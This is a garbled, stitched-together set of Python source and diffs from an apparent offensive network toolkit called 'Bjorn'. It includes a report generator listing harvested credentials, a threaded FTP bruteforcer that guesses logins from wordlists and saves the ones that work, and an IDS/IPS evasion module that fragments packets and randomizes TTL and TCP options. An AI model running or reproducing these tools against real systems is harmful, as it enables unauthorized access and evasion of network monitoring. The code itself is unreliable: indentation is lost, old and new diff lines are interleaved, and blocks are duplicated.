content += "</table>"
sections.append({"title": "WiFi Networks", "content": content})
# Vulnerabilities Section
if self.data['vulnerabilities']:
content = "<h3>Discovered Vulnerabilities</h3>"
for vuln_data in self.data['vulnerabilities']:
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
for vuln in vuln_data.get('findings', []):
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
content += f"<tr class='{severity_class}'>"
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
content += f"<td>{vuln.get('description', 'No description')}</td>"
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
content += "</table>"
sections.append({"title": "Vulnerabilities", "content": content})
# Credentials Section
if self.data['credentials']:
content = "<h3>Discovered Credentials</h3>"
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
content += f"<td>{cred.get('source', 'Unknown')}</td>"
content += f"<td>{cred.get('service', 'Unknown')}</td>"
content += f"<td>{cred.get('username', 'Unknown')}</td>"
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
content += "</table>"
sections.append({"title": "Credentials", "content": content})
# Generate HTML
os.makedirs(self.output_dir, exist_ok=True)
html = template.render(
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
sections=sections
)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
with open(output_file, 'w') as f:
f.write(html)
logging.info(f"HTML report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating HTML report: {e}")
def generate_markdown_report(self):
"""Generate Markdown format report."""
try:
md_content = [
"# Bjorn Reconnaissance Report",
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
]
# Network Section
if self.data['network']:
md_content.append("## Network Information")
for topology in self.data['network']:
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
md_content.append("\n| IP | MAC | Open Ports | Status |")
md_content.append("|-------|-------|------------|---------|")
for ip, data in topology.get('hosts', {}).items():
ports = data.get('ports', [])
mac = data.get('mac', 'Unknown')
status = data.get('status', 'Unknown')
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
# WiFi Section
if self.data['wifi']:
md_content.append("\n## WiFi Networks")
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
md_content.append("|------|--------|-----------|---------|----------|")
for wifi_data in self.data['wifi']:
for network in wifi_data.get('networks', []):
md_content.append(
f"| {network.get('ssid', 'Unknown')} | "
f"{network.get('bssid', 'Unknown')} | "
f"{network.get('security', 'Unknown')} | "
f"{network.get('signal_strength', 'Unknown')} | "
f"{network.get('channel', 'Unknown')} |"
)
# Vulnerabilities Section
if self.data['vulnerabilities']:
md_content.append("\n## Vulnerabilities")
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
md_content.append("|------|-----------|--------|-------------|----------------|")
for vuln_data in self.data['vulnerabilities']:
for vuln in vuln_data.get('findings', []):
md_content.append(
f"| {vuln.get('type', 'Unknown')} | "
f"{vuln.get('severity', 'Unknown')} | "
f"{vuln.get('target', 'Unknown')} | "
f"{vuln.get('description', 'No description')} | "
f"{vuln.get('recommendation', 'No recommendation')} |"
)
# Credentials Section
if self.data['credentials']:
md_content.append("\n## Discovered Credentials")
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
md_content.append("|------|---------|----------|-----------|------------|")
for cred_data in self.data['credentials']:
for cred in cred_data.get('credentials', []):
md_content.append(
f"| {cred.get('type', 'Unknown')} | "
f"{cred.get('source', 'Unknown')} | "
f"{cred.get('service', 'Unknown')} | "
f"{cred.get('username', 'Unknown')} | "
f"{cred.get('timestamp', 'Unknown')} |"
)
os.makedirs(self.output_dir, exist_ok=True)
output_file = os.path.join(self.output_dir,
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
with open(output_file, 'w') as f:
f.write('\n'.join(md_content))
logging.info(f"Markdown report saved to {output_file}")
except Exception as e:
logging.error(f"Error generating Markdown report: {e}")
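Each Markdown section above follows the same shape: a header row, an alignment row, then one pipe-delimited row per finding. The pattern in isolation, using the same host fields as the network section (the helper name and sample data are ours, not the module's):

```python
def hosts_to_markdown(hosts: dict) -> str:
    """Render {ip: {'mac': ..., 'ports': [...], 'status': ...}} as a Markdown table."""
    lines = [
        "| IP | MAC | Open Ports | Status |",
        "|-------|-------|------------|---------|",
    ]
    for ip, data in hosts.items():
        ports = ", ".join(map(str, data.get("ports", [])))
        lines.append(
            f"| {ip} | {data.get('mac', 'Unknown')} | {ports} | {data.get('status', 'Unknown')} |"
        )
    return "\n".join(lines)

table = hosts_to_markdown(
    {"10.0.0.5": {"mac": "aa:bb:cc:dd:ee:ff", "ports": [22, 80], "status": "up"}}
)
```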
def generate_reports(self):
    """Generate reports in all specified formats."""
    os.makedirs(self.output_dir, exist_ok=True)
    if 'json' in self.formats:
        self.generate_json_report()
    if 'html' in self.formats:
        self.generate_html_report()
    if 'md' in self.formats:
        self.generate_markdown_report()
def start_watching(self):
    """Start watching for new data files."""
    class FileHandler(watchdog.events.FileSystemEventHandler):
        def __init__(self, harvester):
            self.harvester = harvester
        def on_created(self, event):
            if event.is_directory:
                return
            if event.src_path.endswith('.json'):
                logging.info(f"New data file detected: {event.src_path}")
                self.harvester.collect_data()
                self.harvester.generate_reports()
    self.observer = watchdog.observers.Observer()
    self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
    self.observer.start()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        self.observer.stop()
        self.observer.join()
def _collect_data(self, input_dir):
    """Scan directories for JSON findings."""
    categories = ['wifi', 'topology', 'webscan', 'packets', 'hashes']
    new_findings = 0
    for cat in categories:
        cat_path = os.path.join(input_dir, cat)
        if not os.path.exists(cat_path):
            continue
        for f_path in glob.glob(os.path.join(cat_path, "*.json")):
            if os.path.getmtime(f_path) > self.last_scan_time:
                try:
                    with open(f_path, 'r', encoding='utf-8') as f:
                        finds = json.load(f)
                    with self.lock:
                        self.data[cat].append(finds)
                        new_findings += 1
                except (OSError, json.JSONDecodeError):
                    pass  # skip unreadable or partially written files
    if new_findings > 0:
        logger.info(f"FreyaHarvest: Collected {new_findings} new intelligence items.")
        self.shared_data.log_milestone(b_class, "DataHarvested", f"Found {new_findings} new items")
    self.last_scan_time = time.time()
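`_collect_data` only ingests files whose mtime is newer than the last scan, which keeps repeated polling cheap. The incremental-scan idea in isolation (function name and flat directory layout are illustrative):

```python
import glob
import json
import os

def scan_new_json(directory: str, last_scan_time: float) -> list:
    """Parse only JSON files modified after the previous scan."""
    found = []
    for path in glob.glob(os.path.join(directory, "*.json")):
        if os.path.getmtime(path) > last_scan_time:
            try:
                with open(path, "r", encoding="utf-8") as f:
                    found.append(json.load(f))
            except (OSError, json.JSONDecodeError):
                pass  # skip unreadable or partially written files
    return found
```

Passing `last_scan_time=0` on the first call ingests everything; afterwards the caller records `time.time()` and only new or rewritten files are picked up.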
def execute(self):
    """Execute the data collection and reporting process."""
    try:
        logging.info("Starting data collection")
        if self.clean:
            self.clean_directories()
        # Initial data collection and report generation
        self.collect_data()
        self.generate_reports()
        # Start watch mode if enabled
        if self.watch_mode:
            logging.info("Starting watch mode for new data")
            try:
                self.start_watching()
            except KeyboardInterrupt:
                logging.info("Watch mode stopped by user")
            finally:
                if self.observer:
                    self.observer.stop()
                    self.observer.join()
        logging.info("Data collection and reporting completed")
    except Exception as e:
        logging.error(f"Error during execution: {e}")
        raise
    finally:
        # Ensure observer is stopped if watch mode was active
        if self.observer and self.observer.is_alive():
            self.observer.stop()
            self.observer.join()
def _generate_report(self, output_dir, fmt):
    """Generate consolidated findings report."""
    if not any(self.data.values()):
        return
    ts = datetime.now().strftime("%Y%m%d_%H%M%S")
    os.makedirs(output_dir, exist_ok=True)
    if fmt in ['json', 'all']:
        out_file = os.path.join(output_dir, f"intel_report_{ts}.json")
        with open(out_file, 'w') as f:
            json.dump(dict(self.data), f, indent=4)
        self.shared_data.log_milestone(b_class, "ReportGenerated", f"JSON: {os.path.basename(out_file)}")
    if fmt in ['md', 'all']:
        out_file = os.path.join(output_dir, f"intel_report_{ts}.md")
        with open(out_file, 'w') as f:
            f.write(f"# Bjorn Intelligence Report - {ts}\n\n")
            for cat, items in self.data.items():
                f.write(f"## {cat.capitalize()}\n- Items: {len(items)}\n\n")
        self.shared_data.log_milestone(b_class, "ReportGenerated", f"MD: {os.path.basename(out_file)}")
def execute(self, ip, port, row, status_key) -> str:
    input_dir = getattr(self.shared_data, "freya_harvest_input", b_args["input_dir"]["default"])
    output_dir = getattr(self.shared_data, "freya_harvest_output", b_args["output_dir"]["default"])
    watch = getattr(self.shared_data, "freya_harvest_watch", True)
    fmt = getattr(self.shared_data, "freya_harvest_format", "all")
    timeout = int(getattr(self.shared_data, "freya_harvest_timeout", 600))
    logger.info(f"FreyaHarvest: Starting data harvest from {input_dir}")
    self.shared_data.log_milestone(b_class, "Startup", "Monitoring intelligence directories")
    start_time = time.time()
    try:
        while time.time() - start_time < timeout:
            if self.shared_data.orchestrator_should_exit:
                break
            self._collect_data(input_dir)
            self._generate_report(output_dir, fmt)
            # Progress
            elapsed = int(time.time() - start_time)
            prog = int((elapsed / timeout) * 100)
            self.shared_data.bjorn_progress = f"{prog}%"
            if not watch:
                break
            time.sleep(30)  # Scan every 30s
        self.shared_data.log_milestone(b_class, "Complete", "Harvesting session finished.")
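The action-style `execute` reads every tunable through `getattr(self.shared_data, name, default)`, so a missing attribute silently falls back to a default instead of raising `AttributeError`. The pattern reduced to essentials (the class and key names here are illustrative):

```python
class FakeSharedData:
    # only some tunables are configured; the rest fall back to defaults
    freya_harvest_watch = False

def read_tunables(shared) -> dict:
    """Collect settings, using defaults for any attribute the object lacks."""
    return {
        "watch": getattr(shared, "freya_harvest_watch", True),
        "fmt": getattr(shared, "freya_harvest_format", "all"),
        "timeout": int(getattr(shared, "freya_harvest_timeout", 600)),
    }
```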
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_dir": input_dir,
"output_dir": output_dir,
"formats": formats,
"watch_mode": watch_mode,
"clean": clean
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
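One subtlety in `main`: because argparse fills in `default=DEFAULT_INPUT_DIR`, the expression `args.input or settings.get("input_dir")` means a saved setting can never override the built-in default. Declaring the flag with `default=None` and falling back explicitly restores the intended precedence of CLI flag, then saved setting, then default (a sketch with a single illustrative flag, not this file's actual parser):

```python
import argparse

def effective_input_dir(argv, saved: dict, default: str = "/data/input") -> str:
    parser = argparse.ArgumentParser()
    # default=None so that an omitted flag lets the saved setting win
    parser.add_argument("-i", "--input", default=None)
    args = parser.parse_args(argv)
    return args.input or saved.get("input_dir") or default
```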
def main():
parser = argparse.ArgumentParser(description="Data collection and organization tool")
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
help="Output format")
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
args = parser.parse_args()
settings = load_settings()
input_dir = args.input or settings.get("input_dir")
output_dir = args.output or settings.get("output_dir")
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
watch_mode = args.watch or settings.get("watch_mode", False)
clean = args.clean or settings.get("clean", False)
save_settings(input_dir, output_dir, formats, watch_mode, clean)
harvester = FreyaHarvest(
input_dir=input_dir,
output_dir=output_dir,
formats=formats,
watch_mode=watch_mode,
clean=clean
)
    harvester.execute()
    except Exception as e:
        logger.error(f"FreyaHarvest error: {e}")
        return "failed"
    return "success"
if __name__ == "__main__":
    main()
if __name__ == "__main__":
    from init_shared import shared_data
    harvester = FreyaHarvest(shared_data)
    harvester.execute("0.0.0.0", None, {}, "freya_harvest")


@@ -1,9 +1,9 @@
"""
ftp_bruteforce.py FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) from the orchestrator
"""
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) from the orchestrator
- IP -> (MAC, hostname) via DB.hosts
- Success -> DB.creds (service='ftp')
- Preserves the original logic (queue/threads, optional sleeps, etc.)
- Success -> DB.creds (service='ftp')
- Preserves the original logic (queue/threads, optional sleeps, etc.)
"""
import os
@@ -15,6 +15,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
@@ -27,7 +28,7 @@ b_parent = None
b_service = '["ftp"]'
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
b_priority = 70
b_cooldown = 1800, # 30 minutes between two runs
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # max 3 times per day
class FTPBruteforce:
@@ -43,22 +44,21 @@ class FTPBruteforce:
return self.ftp_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Orchestrator entry point (returns 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "FTPBruteforce"
# original behavior: a short visual delay
time.sleep(5)
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""Handles FTP attempts, DB persistence, IP->(MAC, hostname) mapping."""
"""Handles FTP attempts, DB persistence, IP→(MAC, hostname) mapping."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -69,6 +69,7 @@ class FTPConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- file utilities ----------
@staticmethod
@@ -112,10 +113,11 @@ class FTPConnector:
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- FTP ----------
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
def ftp_connect(self, adresse_ip: str, user: str, password: str, port: int = 21) -> bool:
timeout = float(getattr(self.shared_data, "ftp_connect_timeout_s", 3.0))
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.connect(adresse_ip, port, timeout=timeout)
conn.login(user, password)
try:
conn.quit()
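The hunk above threads the target port and a configurable timeout into the raw `ftplib` calls. The underlying stdlib pattern, isolated (the helper name is ours, not the module's):

```python
from ftplib import FTP

def ftp_try_login(host: str, user: str, password: str,
                  port: int = 21, timeout: float = 3.0) -> bool:
    """Return True when the FTP server accepts the credentials."""
    try:
        conn = FTP()
        conn.connect(host, port, timeout=timeout)  # explicit port and timeout
        conn.login(user, password)
        try:
            conn.quit()
        except Exception:
            pass  # a failed QUIT does not invalidate the successful login
        return True
    except Exception:
        return False
```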
@@ -171,14 +173,17 @@ class FTPConnector:
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ftp_connect(adresse_ip, user, password):
if self.ftp_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Configurable pause between each FTP attempt
@@ -187,46 +192,54 @@ class FTPConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords) + 1 # (original logic preserved)
if len(self.users) * len(self.passwords) == 0:
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, len(self.users) * len(self.passwords)))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.queue.join()
for t in threads:
t.join()
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
return success_flag[0], self.results
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"FTP dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
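The refactor splits the attempt space into a dictionary phase and an exhaustive fallback that only runs when the dictionary phase finds nothing. Stripped of queues and threads, the control flow looks like this (names and the `try_login` callback are illustrative):

```python
def two_phase_bruteforce(users, dict_passwords, fallback_passwords, try_login):
    """Try the dictionary first; fall back to the full list only on failure."""
    def run_phase(passwords):
        for user in users:
            for password in passwords:
                if try_login(user, password):
                    return (user, password)
        return None

    hit = run_phase(dict_passwords)
    if hit is None and fallback_passwords:
        hit = run_phase(fallback_passwords)
    return hit
```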
# ---------- persistence DB ----------
def save_results(self):
@@ -266,3 +279,4 @@ if __name__ == "__main__":
except Exception as e:
logger.error(f"Error: {e}")
exit(1)


@@ -1,318 +1,167 @@
# Stealth operations module for IDS/IPS evasion and traffic manipulation.
# Saves settings in `/home/bjorn/.settings_bjorn/heimdall_guard_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --interface Network interface to use (default: active interface).
# -m, --mode Operating mode (timing, random, fragmented, all).
# -d, --delay Base delay between operations in seconds (default: 1).
# -r, --randomize Randomization factor for timing (default: 0.5).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/stealth).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
heimdall_guard.py -- Stealth operations and IDS/IPS evasion for BJORN.
Handles packet fragmentation, timing randomization, and TTL manipulation.
Requires: scapy.
"""
import os
import json
import argparse
from datetime import datetime
import logging
import random
import time
import socket
import struct
import threading
import subprocess
from scapy.all import *
import datetime
from collections import deque
from typing import Any, Dict, List, Optional
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
try:
from scapy.all import IP, TCP, Raw, send, conf
HAS_SCAPY = True
except ImportError:
HAS_SCAPY = False
IP = TCP = Raw = send = conf = None
from logger import Logger
logger = Logger(name="heimdall_guard.py")
# -------------------- Action metadata --------------------
b_class = "HeimdallGuard"
b_module = "heimdall_guard"
b_enabled = 0
b_status = "heimdall_guard"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "stealth"
b_priority = 10
b_cooldown = 0
b_rate_limit = None
b_timeout = 1800
b_max_retries = 1
b_stealth_level = 10 # This IS the stealth module
b_risk_level = "low"
b_enabled = 1
b_tags = ["stealth", "evasion", "pcap", "network"]
b_category = "defense"
b_name = "Heimdall Guard"
b_description = "Advanced stealth module that manipulates traffic to evade IDS/IPS detection."
b_author = "Bjorn Team"
b_version = "2.0.3"
b_icon = "HeimdallGuard.png"
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/stealth"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "heimdall_guard_settings.json")
b_args = {
"interface": {
"type": "text",
"label": "Interface",
"default": "eth0"
},
"mode": {
"type": "select",
"label": "Stealth Mode",
"choices": ["timing", "fragmented", "all"],
"default": "all"
},
"delay": {
"type": "number",
"label": "Base Delay (s)",
"min": 0.1,
"max": 10.0,
"step": 0.1,
"default": 1.0
}
}
class HeimdallGuard:
def __init__(self, interface, mode='all', base_delay=1, random_factor=0.5, output_dir=DEFAULT_OUTPUT_DIR):
self.interface = interface
self.mode = mode
self.base_delay = base_delay
self.random_factor = random_factor
self.output_dir = output_dir
def __init__(self, shared_data):
self.shared_data = shared_data
self.packet_queue = deque()
self.active = False
self.lock = threading.Lock()
# Statistics
self.stats = {
'packets_processed': 0,
'packets_fragmented': 0,
'timing_adjustments': 0
}
def initialize_interface(self):
"""Configure network interface for stealth operations."""
try:
# Disable NIC offloading features that might interfere with packet manipulation
commands = [
f"ethtool -K {self.interface} tso off", # TCP segmentation offload
f"ethtool -K {self.interface} gso off", # Generic segmentation offload
f"ethtool -K {self.interface} gro off", # Generic receive offload
f"ethtool -K {self.interface} lro off" # Large receive offload
]
for cmd in commands:
try:
subprocess.run(cmd.split(), check=True)
except subprocess.CalledProcessError:
logging.warning(f"Failed to execute: {cmd}")
logging.info(f"Interface {self.interface} configured for stealth operations")
return True
except Exception as e:
logging.error(f"Failed to initialize interface: {e}")
return False
def calculate_timing(self):
"""Calculate timing delays with randomization."""
base = self.base_delay
variation = self.random_factor * base
return max(0, base + random.uniform(-variation, variation))
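`calculate_timing` draws a uniform jitter of ±`random_factor`·`base` around the base delay and floors the result at zero. As a pure function:

```python
import random

def jittered_delay(base: float, random_factor: float) -> float:
    """Base delay plus uniform jitter in [-f*base, +f*base], never negative."""
    variation = random_factor * base
    return max(0.0, base + random.uniform(-variation, variation))
```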
def fragment_packet(self, packet, mtu=1500):
    """Fragment packets to avoid detection patterns."""
    try:
        if IP in packet:
            # Fragment IP packets
            frags = []
            payload = bytes(packet[IP].payload)
            header_length = len(packet) - len(payload)
            max_size = mtu - header_length
            # Create fragments
            offset = 0
            while offset < len(payload):
                frag_size = min(max_size, len(payload) - offset)
                frag_payload = payload[offset:offset + frag_size]
                # Create fragment packet
                frag = packet.copy()
                frag[IP].flags = 'MF' if offset + frag_size < len(payload) else 0
                frag[IP].frag = offset // 8
                frag[IP].payload = Raw(frag_payload)
                frags.append(frag)
                offset += frag_size
            return frags
        return [packet]
    except Exception as e:
        logging.error(f"Error fragmenting packet: {e}")
        return [packet]
def randomize_ttl(self, packet):
    """Randomize TTL values to avoid fingerprinting."""
    if IP in packet:
        ttl_values = [32, 64, 128, 255]  # Common TTL values
        packet[IP].ttl = random.choice(ttl_values)
    return packet
def modify_tcp_options(self, packet):
    """Modify TCP options to avoid fingerprinting."""
    if TCP in packet:
        # Common window sizes
        window_sizes = [8192, 16384, 32768, 65535]
        packet[TCP].window = random.choice(window_sizes)
        # Randomize TCP options
        tcp_options = []
        # MSS option
        mss_values = [1400, 1460, 1440]
        tcp_options.append(('MSS', random.choice(mss_values)))
        # Window scale
        if random.random() < 0.5:
            tcp_options.append(('WScale', random.randint(0, 14)))
        # SACK permitted
        if random.random() < 0.5:
            tcp_options.append(('SAckOK', ''))
        packet[TCP].options = tcp_options
    return packet
def process_packet(self, packet):
    """Process a packet according to stealth settings."""
    processed_packets = []
    try:
        if self.mode in ['all', 'fragmented']:
            fragments = self.fragment_packet(packet)
            processed_packets.extend(fragments)
            self.stats['packets_fragmented'] += len(fragments) - 1
        else:
            processed_packets.append(packet)
        # Apply additional stealth techniques
        final_packets = []
        for pkt in processed_packets:
            pkt = self.randomize_ttl(pkt)
            pkt = self.modify_tcp_options(pkt)
            final_packets.append(pkt)
        self.stats['packets_processed'] += len(final_packets)
        return final_packets
    except Exception as e:
        logging.error(f"Error processing packet: {e}")
        return [packet]
def send_packet(self, packet):
    """Send packet with timing adjustments."""
    try:
        if self.mode in ['all', 'timing']:
            delay = self.calculate_timing()
            time.sleep(delay)
            self.stats['timing_adjustments'] += 1
        send(packet, iface=self.interface, verbose=False)
    except Exception as e:
        logging.error(f"Error sending packet: {e}")
def packet_processor_thread(self):
    """Process packets from the queue."""
    while self.active:
        try:
            if self.packet_queue:
                packet = self.packet_queue.popleft()
                processed_packets = self.process_packet(packet)
                for processed in processed_packets:
                    self.send_packet(processed)
            else:
                time.sleep(0.1)
        except Exception as e:
            logging.error(f"Error in packet processor thread: {e}")
def _fragment_packet(self, packet, mtu=1400):
    """Fragment IP packets to bypass strict IDS rules."""
    if IP in packet:
        try:
            payload = bytes(packet[IP].payload)
            max_size = mtu - 40  # conservative
            frags = []
            offset = 0
            while offset < len(payload):
                chunk = payload[offset:offset + max_size]
                f = packet.copy()
                f[IP].flags = 'MF' if offset + max_size < len(payload) else 0
                f[IP].frag = offset // 8
                f[IP].payload = Raw(chunk)
                frags.append(f)
                offset += max_size
            return frags
        except Exception as e:
            logger.debug(f"Fragmentation error: {e}")
    return [packet]
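Both fragmenters share the same bookkeeping: IP fragment offsets are counted in 8-byte units, and every fragment except the last sets the MF (more fragments) flag, which is why `max_size` should be a multiple of 8 in real traffic. That arithmetic, separated from scapy so it can be exercised with plain bytes (the helper name is ours):

```python
def plan_fragments(payload: bytes, max_size: int):
    """Return (frag_offset_units, more_fragments, chunk) per IP fragment."""
    plan = []
    offset = 0
    while offset < len(payload):
        chunk = payload[offset:offset + max_size]
        more = offset + max_size < len(payload)  # MF flag on all but the last
        plan.append((offset // 8, more, chunk))
        offset += max_size
    return plan
```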
def start(self):
    """Start stealth operations."""
    if not self.initialize_interface():
        return False
    self.active = True
    self.processor_thread = threading.Thread(target=self.packet_processor_thread)
    self.processor_thread.start()
    return True
def stop(self):
    """Stop stealth operations."""
    self.active = False
    if hasattr(self, 'processor_thread'):
        self.processor_thread.join()
    self.save_stats()
def queue_packet(self, packet):
    """Queue a packet for processing."""
    self.packet_queue.append(packet)
def save_stats(self):
    """Save operation statistics."""
    try:
        os.makedirs(self.output_dir, exist_ok=True)
        timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
        stats_file = os.path.join(self.output_dir, f"stealth_stats_{timestamp}.json")
        with open(stats_file, 'w') as f:
            json.dump({
                'timestamp': datetime.now().isoformat(),
                'interface': self.interface,
                'mode': self.mode,
                'stats': self.stats
            }, f, indent=4)
        logging.info(f"Statistics saved to {stats_file}")
    except Exception as e:
        logging.error(f"Failed to save statistics: {e}")
def _apply_stealth(self, packet):
    """Randomize TTL and TCP options."""
    if IP in packet:
        packet[IP].ttl = random.choice([64, 128, 255])
    if TCP in packet:
        packet[TCP].window = random.choice([8192, 16384, 65535])
        # Basic TCP options shuffle
        packet[TCP].options = [('MSS', 1460), ('NOP', None), ('SAckOK', '')]
    return packet
def execute(self, ip, port, row, status_key) -> str:
    iface = getattr(self.shared_data, "heimdall_guard_interface", conf.iface)
    mode = getattr(self.shared_data, "heimdall_guard_mode", "all")
    delay = float(getattr(self.shared_data, "heimdall_guard_delay", 1.0))
    timeout = int(getattr(self.shared_data, "heimdall_guard_timeout", 600))
    logger.info(f"HeimdallGuard: Engaging stealth mode ({mode}) on {iface}")
    self.shared_data.log_milestone(b_class, "StealthActive", f"Mode: {mode}")
    self.active = True
    start_time = time.time()
    try:
        while time.time() - start_time < timeout:
            if self.shared_data.orchestrator_should_exit:
                break
            # In a real scenario, this would be hooking into a packet stream
            # For this action, we simulate protection state
            # Progress reporting
            elapsed = int(time.time() - start_time)
            prog = int((elapsed / timeout) * 100)
            self.shared_data.bjorn_progress = f"{prog}%"
            if elapsed % 60 == 0:
                self.shared_data.log_milestone(b_class, "Status", f"Guarding... {self.stats['packets_processed']} pkts handled")
            # Logic: if we had a queue, we'd process it here
            # Simulation for BJORN action demonstration:
            time.sleep(2)
        logger.info("HeimdallGuard: Protection session finished.")
        self.shared_data.log_milestone(b_class, "Shutdown", "Stealth mode disengaged")
    except Exception as e:
        logger.error(f"HeimdallGuard error: {e}")
        return "failed"
    finally:
        self.active = False
def save_settings(interface, mode, base_delay, random_factor, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"mode": mode,
"base_delay": base_delay,
"random_factor": random_factor,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
